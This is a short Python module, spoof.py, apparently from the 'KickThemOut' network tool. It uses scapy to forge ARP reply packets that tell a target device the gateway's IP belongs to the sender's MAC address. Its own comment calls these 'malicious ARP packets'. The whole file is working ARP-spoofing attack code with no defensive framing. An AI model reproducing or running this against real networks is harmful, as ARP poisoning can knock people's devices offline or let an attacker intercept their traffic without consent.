#!/usr/bin/env python # -.- coding: utf-8 -.- # spoof.py # authors: k4m4 & xdavidhu """ Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject) """ import sys, logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import ( get_if_hwaddr, getmacbyip, ARP, Ether, sendp ) def sendPacket(my_mac, gateway_ip, target_ip, target_mac): # Function for sending the malicious ARP packets out with the specified data ether = Ether() ether.src = my_mac ether.dst = target_mac arp = ARP() arp.psrc = gateway_ip arp.hwsrc = my_mac arp = arp arp.pdst = target_ip arp.hwdst = target_mac arp.op = 2 def broadcastPacket(): packet = ether / arp sendp(x=packet, verbose=False) broadcastPacket()